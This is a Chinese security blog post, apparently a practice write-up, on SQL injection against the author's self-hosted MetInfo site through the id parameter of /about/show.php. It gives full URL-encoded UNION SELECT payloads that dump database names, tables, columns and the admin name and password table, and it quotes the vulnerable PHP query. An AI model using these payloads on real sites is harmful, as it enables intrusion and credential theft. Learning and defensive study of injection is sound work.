<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>记一次曲折的注入 | BlBana&#39;s Blog 一只Web汪 ~</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="这两天自己搭了一个Metinfo的站点练手，从网上找了个注入点，手工测试了一下明显的有注入点的存在，先扔到SQLMAP里跑跑看~~">
<meta name="keywords" content="Webshell,SQL注入,服务器">
<meta property="og:type" content="article">
<meta property="og:title" content="记一次曲折的注入">
<meta property="og:url" content="http://blbana.cc/2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/index.html">
<meta property="og:site_name" content="BlBana&#39;s Blog 一只Web汪 ~">
<meta property="og:description" content="这两天自己搭了一个Metinfo的站点练手，从网上找了个注入点，手工测试了一下明显的有注入点的存在，先扔到SQLMAP里跑跑看~~">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/1.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/2.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/3.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/4.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/5.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/7.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/8.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/9.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/10.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/11.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/12.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/13.jpg">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/14.jpg">
<meta property="og:updated_time" content="2018-10-24T11:57:44.974Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="记一次曲折的注入">
<meta name="twitter:description" content="这两天自己搭了一个Metinfo的站点练手，从网上找了个注入点，手工测试了一下明显的有注入点的存在，先扔到SQLMAP里跑跑看~~">
<meta name="twitter:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/1.jpg">
  
    <link rel="alternative" href="/atom.xml" title="BlBana&#39;s Blog 一只Web汪 ~" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.jpg" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">BlBana</a></h1>
        </hgroup>

        
        <p class="header-subtitle">A interesting Web Dog~</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/index.html">首页</a></li>
                        
                            <li><a href="/archives">所有文章</a></li>
                        
                            <li><a href="/tags">标签页</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="https://mail.qq.com/cgi-bin/frame_html?sid=1iXYOD0d3gFFCC11&r=8a78462be569bc94330c32990aaf4f0e" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/BlBana" title="github">github</a>
                            
                                <a class="fl zhihu" target="_blank" href="https://www.zhihu.com/people/zhu-rong-ji-15/activities" title="zhihu">zhihu</a>
                            
                                <a class="fl weibo" target="_blank" href="#" title="weibo">weibo</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/CTF/" style="font-size: 12.5px;">CTF</a> <a href="/tags/PHP/" style="font-size: 17.5px;">PHP</a> <a href="/tags/PHP函数漏洞/" style="font-size: 10px;">PHP函数漏洞</a> <a href="/tags/SQL注入/" style="font-size: 15px;">SQL注入</a> <a href="/tags/SQL注入绕过/" style="font-size: 10px;">SQL注入绕过</a> <a href="/tags/Struts2/" style="font-size: 10px;">Struts2</a> <a href="/tags/Tomcat/" style="font-size: 10px;">Tomcat</a> <a href="/tags/WP/" style="font-size: 10px;">WP</a> <a href="/tags/Webshell/" style="font-size: 20px;">Webshell</a> <a href="/tags/Web安全/" style="font-size: 15px;">Web安全</a> <a href="/tags/Windows安全配置/" style="font-size: 15px;">Windows安全配置</a> <a href="/tags/blogs/" style="font-size: 10px;">blogs</a> <a href="/tags/docker/" style="font-size: 10px;">docker</a> <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/waf绕过/" style="font-size: 10px;">waf绕过</a> <a href="/tags/上传漏洞/" style="font-size: 15px;">上传漏洞</a> <a href="/tags/上传绕过方法/" style="font-size: 10px;">上传绕过方法</a> <a href="/tags/代码执行/" style="font-size: 10px;">代码执行</a> <a href="/tags/修改密码/" style="font-size: 10px;">修改密码</a> <a href="/tags/命令执行漏洞/" style="font-size: 10px;">命令执行漏洞</a> <a href="/tags/安全编码/" style="font-size: 10px;">安全编码</a> <a href="/tags/安全配置/" style="font-size: 10px;">安全配置</a> <a href="/tags/宽字节注入/" style="font-size: 10px;">宽字节注入</a> <a href="/tags/提权/" style="font-size: 10px;">提权</a> <a href="/tags/文件包含/" style="font-size: 12.5px;">文件包含</a> <a href="/tags/服务器/" style="font-size: 15px;">服务器</a> <a href="/tags/服务器配置/" style="font-size: 20px;">服务器配置</a> <a href="/tags/沙盒/" style="font-size: 10px;">沙盒</a> <a href="/tags/漏洞复现/" style="font-size: 10px;">漏洞复现</a> <a href="/tags/绕过过滤/" style="font-size: 10px;">绕过过滤</a> <a href="/tags/转载/" style="font-size: 10px;">转载</a> <a href="/tags/运维/" style="font-size: 17.5px;">运维</a> <a href="/tags/邮件系统/" style="font-size: 10px;">邮件系统</a> <a href="/tags/随笔/" style="font-size: 10px;">随笔</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://blog.0wen.cc">0wen</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">Web dog，会PHP，Python，代码审计，来有木有一起屁股的~</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">BlBana</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">BlBana</a></h1>
            </hgroup>
            
            <p class="header-subtitle">A interesting Web Dog~</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/index.html">首页</a></li>
                
                    <li><a href="/archives">所有文章</a></li>
                
                    <li><a href="/tags">标签页</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="https://mail.qq.com/cgi-bin/frame_html?sid=1iXYOD0d3gFFCC11&r=8a78462be569bc94330c32990aaf4f0e" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/BlBana" title="github">github</a>
                    
                        <a class="zhihu" target="_blank" href="https://www.zhihu.com/people/zhu-rong-ji-15/activities" title="zhihu">zhihu</a>
                    
                        <a class="weibo" target="_blank" href="#" title="weibo">weibo</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/" class="article-date">
      <time datetime="2016-07-28T02:31:52.000Z" itemprop="datePublished">2016-07-28</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      记一次曲折的注入
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/SQL注入/">SQL注入</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/SQL注入/">SQL注入</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Webshell/">Webshell</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/服务器/">服务器</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>这两天自己搭了一个Metinfo的站点练手，从网上找了个注入点，手工测试了一下明显的有注入点的存在，先扔到SQLMAP里跑跑看~~</p>
<a id="more"></a>
<h3 id="曲折才刚刚开始"><a href="#曲折才刚刚开始" class="headerlink" title="曲折才刚刚开始"></a>曲折才刚刚开始</h3><p><a href="http://mp.weixin.qq.com/s?__biz=MzIxNTIzMzM1Ng==&amp;mid=2651101014&amp;idx=1&amp;sn=15e52b03d594c7e848aef5b9e710a19c&amp;scene=24&amp;srcid=0716THfw2YH0oxgZcJ9Uc84M#rd" target="_blank" rel="noopener">参考链接</a></p>
<p><code>/about/show.php?lang=cn&amp;amp;id=22</code></p>
<p>这两天自己搭了一个Metinfo的站点练手，从网上找了个注入点，手工测试了一下明显的有注入点的存在，先扔到SQLMAP里跑跑看~~</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/1.jpg" alt="image"></p>
<p>成功跑出来了我服务器上的所有数据库 ~ 可以的 大兄弟</p>
<p>接着来跑跑表和字段吧~~</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/2.jpg" alt="image"></p>
<p>接着又跑出来了所有的表和met_admin_column表中的所有字段，看来马上就成功啦 哈哈</p>
<blockquote>
<p>其实我们在使用工具的时候根据工具中回显的情况基本就可判断出，SQLMAP使用的是什么payload以及注入的具体方式，比如在我这次查询的过程中，可以看到不论查询的是数据库还是表，都是一个一个进行查询的，就可以判断出来payload中使用了LIMIT这样的查询方式，限定了每次查询的个数。要是出现一个一个字符出来的情况，可以判断出，查询数据库的版本可能较低，因为通常现在的数据库都是有元数据表的，可以直接进行查询，一个字符一个字符出现，说明他利用ACSII码在进行比对比对成功以后回显字符。<br>但是继续用SQLMAP跑字段中数据的时候出现了错误，无法dump字段中的数据，曲折就此开始……</p>
</blockquote>
<hr>
<h3 id="开启手工大法"><a href="#开启手工大法" class="headerlink" title="开启手工大法"></a>开启手工大法</h3><p>既然工具无法顺利的跑出数据，可以尝试使用手工进行注入</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/3.jpg" alt="image"></p>
<p>这是一个正常的页面</p>
<h4 id="爆字段数"><a href="#爆字段数" class="headerlink" title="爆字段数"></a>爆字段数</h4><p>首先来测试一下字段数有多少，通常我们使用order by语句进行查询，尝试多次order by n ，n值无论如何测试，页面回显都是正常的，说明这种测试方法行不通</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/4.jpg" alt="image"></p>
<p>换着使用union语句去查询当前表的字段数，利用：</p>
<p><code>UNION ALL SELECT null</code></p>
<p><code>UNION ALL SELECT null,null</code></p>
<p><code>UNION ALL SELECT null,null,null</code></p>
<p>方式递归查询字段数，直到返回正常的页面为止，当我查询到27个字段时为正常，第28个报错时，可以判断出共有27个字段数。</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/5.jpg" alt="image"></p>
<p>成功爆出了字段数，继续下一步</p>
<h4 id="爆出数据库"><a href="#爆出数据库" class="headerlink" title="爆出数据库"></a>爆出数据库</h4><p>先使用联合查询尝试爆出显位</p>
<p><code>UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27</code></p>
<p>页面回显404，出现了错误 （<em>通过查看源代码可以知道，只要SQL语句查询不正确，就会返回404</em>）</p>
<p>修改payload，将整个payload进行URL编码</p>
<p><code>%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23</code></p>
<p>此时页面回显正常，说明我们语句构造成功了</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/7.jpg" alt="image"></p>
<p>但是回显的页面说我们权限不够，先不管他继续尝试注入看是否能够成功。</p>
<p>先构造出查询数据库的查询语句，如下所示：</p>
<p><code>%28SELECT%20CONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%2C0x71716a6a71%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%207%2C1%29</code></p>
<p><code>SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA</code></p>
<p>以上两种语句都可以查询元数据表中的各个数据库名字</p>
<p>我们将查询语句依次尝试放入各个字段的位置里进行测试，发现除了21号位置以外，其他不管放在什么位置都会弹出窗口显示权限不足。</p>
<p><strong>其他位置</strong></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/8.jpg" alt="image"></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/9.jpg" alt="image"></p>
<p><strong>21号字段</strong></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/10.jpg" alt="image"></p>
<p>此时我们可以看到，当我们把查询语句放在21号位置上的时候页面返回正常，并且成功的爆出了显位是14号位置，仿佛看见了希望呀，感动~~~</p>
<p>直接把查询语句放在14号位置，21号位置不放时，又出现了错误。。。我。。尼 淡定 。。。想了想看来得有个语句把21号位置占住了，不然有了显位也没用，没办法爆出数据库。</p>
<p><code>/about/show.php?lang=cn&amp;amp;id=-1411%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2CCONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())%2C15%2C16%2C17%2C18%2C19%2C20%2C%28SELECT%20CONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%2C0x71716a6a71%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%207%2C1%29%2C22%2C23%2C24%2C25%2C26%2C27%23</code></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/11.jpg" alt="image"></p>
<p>这次再次尝试了新的payload，看到结果感动的不要不要的，数据库爆出来了 让我哭一会 （<em>看起来很容易的样子，我弄的时候刚开始没想到这，各种挠头啊啊啊，还是突然想到这么搞得…</em>）</p>
<p>爆出了数据库剩下的就简单了</p>
<h4 id="爆出表"><a href="#爆出表" class="headerlink" title="爆出表"></a>爆出表</h4><p><code>/about/show.php?lang=cn&amp;amp;id=-1411%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=0x6d6574)%2C15%2C16%2C17%2C18%2C19%2C20%2C%28SELECT%20CONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%2C0x71716a6a71%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%207%2C1%29%2C22%2C23%2C24%2C25%2C26%2C27%23</code></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/12.jpg" alt="image"></p>
<p>哈哈 ~ fighting</p>
<h4 id="爆字段"><a href="#爆字段" class="headerlink" title="爆字段"></a>爆字段</h4><p><code>/about/show.php?lang=cn&amp;amp;id=-1411%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6d65745f61646d696e5f7461626c65)%2C15%2C16%2C17%2C18%2C19%2C20%2C%28SELECT%20CONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%2C0x71716a6a71%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%207%2C1%29%2C22%2C23%2C24%2C25%2C26%2C27%23</code></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/13.jpg" alt="image"></p>
<h4 id="爆数据"><a href="#爆数据" class="headerlink" title="爆数据"></a>爆数据</h4><p><code>/about/show.php?lang=cn&amp;amp;id=-1411%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C(SELECT+GROUP_CONCAT(admin_pass,admin_name+SEPARATOR+0x3c62723e)+FROM+met.met_admin_table)%2C15%2C16%2C17%2C18%2C19%2C20%2C%28SELECT%20CONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%2C0x71716a6a71%29%20FROM%20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%207%2C1%29%2C22%2C23%2C24%2C25%2C26%2C27%23</code></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/image/jpg/Metinfo/14.jpg" alt="image"></p>
<p>成功</p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>其实这个注入并不难，从它的代码上看到，没有任何的过滤措施，注入点就是一个基于布尔型的盲注，只要能够构造出来正确的查询语句，查询起来并不困难。这个注入点的难点其实就在于，你必须在占住21号位置的前提下利用14号位置进行查询，再者就是构造的语句必须经过URL编码，否则会报错。</p>
<p><code>$show = $db-&amp;gt;get_one(&quot;SELECT * FROM $met_column WHERE id=$id and module=1&quot;);</code></p>
<p>这个是注入点的代码，发现其实很简答。</p>
<blockquote>
<p>原文链接上给出的是基于时间型的盲注，可能是因为他们防护措施做的比较好，无法回显数据出来，我是直接在服务器上搭好当练习使用的，没有太多的防护措施，这个时候就可以巧妙地利用SQL语句中sleep()函数进行注入，这样即便没有回显，我们也可以拿到数据库等信息</p>
</blockquote>
<hr>
<p>通过这次练习，真的说明了渗透靠的是耐心，这个漏洞使用各种姿势去构造语句，一直没办法成功，这也说明了实战经验还是太少了，但是其实只要明白了整个注入的原理，根据返回的数据进行payload的修改，肯定能够构造出正确的语句，<strong>注入的重点在于语句的构造，这也需要我们对SQL语句的熟练，以及对于常用数据库特性有着不错的理解，因此学好SQL语句和Mysql，Mssql，Oracle等常用的数据库都是必须的</strong></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/">记一次曲折的注入</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 BlBana 的个人博客">BlBana</a></p>
        <p><span>发布时间:</span>2016年07月28日 - 10时31分</p>
        <p><span>最后更新:</span>2018年10月24日 - 19时57分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/" title="记一次曲折的注入">http://blbana.cc/2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/</a>
            <span class="copy-path" data-clipboard-text="原文: http://blbana.cc/2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/　　作者: BlBana" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target="_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2016/07/30/158/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          文件上传漏洞（一）
        
      </div>
    </a>
  
  
    <a href="/2016/07/28/webshell-e6-8f-90-e6-9d-83-ef-bc-88-e4-b8-80-ef-bc-89/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">Webshell提权（一）</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#曲折才刚刚开始"><span class="toc-number">1.</span> <span class="toc-text">曲折才刚刚开始</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#开启手工大法"><span class="toc-number">2.</span> <span class="toc-text">开启手工大法</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#爆字段数"><span class="toc-number">2.1.</span> <span class="toc-text">爆字段数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#爆出数据库"><span class="toc-number">2.2.</span> <span class="toc-text">爆出数据库</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#爆出表"><span class="toc-number">2.3.</span> <span class="toc-text">爆出表</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#爆字段"><span class="toc-number">2.4.</span> <span class="toc-text">爆字段</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#爆数据"><span class="toc-number">2.5.</span> <span class="toc-text">爆数据</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#总结"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>





<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
      <div class="duoshuo" id="comments">
    <!-- 多说评论框 start -->
    <div class="ds-thread" data-thread-key="2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/" data-title="记一次曲折的注入" data-url="http://blbana.cc/2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/"></div>
    <!-- 多说评论框 end -->
    <!-- 多说公共JS代码 start (一个网页只需插入一次) -->
    <script type="text/javascript">
    var duoshuoQuery = {short_name:"blbana"};
    (function() {
        var ds = document.createElement('script');
        ds.type = 'text/javascript';ds.async = true;
        ds.src = '/js/embed.js';
        ds.charset = 'UTF-8';
        (document.getElementsByTagName('head')[0] 
         || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
    </script>
    <!-- 多说公共JS代码 end -->
</div>

    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2016/07/30/158/" title="上一篇: 文件上传漏洞（一）">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2016/07/28/webshell-e6-8f-90-e6-9d-83-ef-bc-88-e4-b8-80-ef-bc-89/" title="下一篇: Webshell提权（一）">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2018/09/14/20180914-回归博客/">emmm...诈尸Test</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/20/SQLi-——-逗号，空格，字段名过滤突破/">SQLi —— 逗号，空格，字段名过滤突破</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/08/Struts2远程命令执行漏洞/">Struts2远程命令执行漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/19/PHP-s-mail-远程代码执行/">PHP's mail()远程代码执行</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/15/Pwnhub外传第一关总结/">Pwnhub外传第一关总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/14/论如何修改Win10密码/">论如何修改Win10密码</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/05/Mysql宽字节注入/">Mysql宽字节注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/05/Wordpress迁移hexo踩坑指南/">Wordpress迁移hexo踩坑指南</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/03/e6-96-87-e4-bb-b6-e5-8c-85-e5-90-ab-e6-bc-8f-e6-b4-9e-ef-bc-88-e4-ba-8c-ef-bc-89/">文件包含漏洞（二）</a></li><li class="post-list-item"><a class="post-list-link" 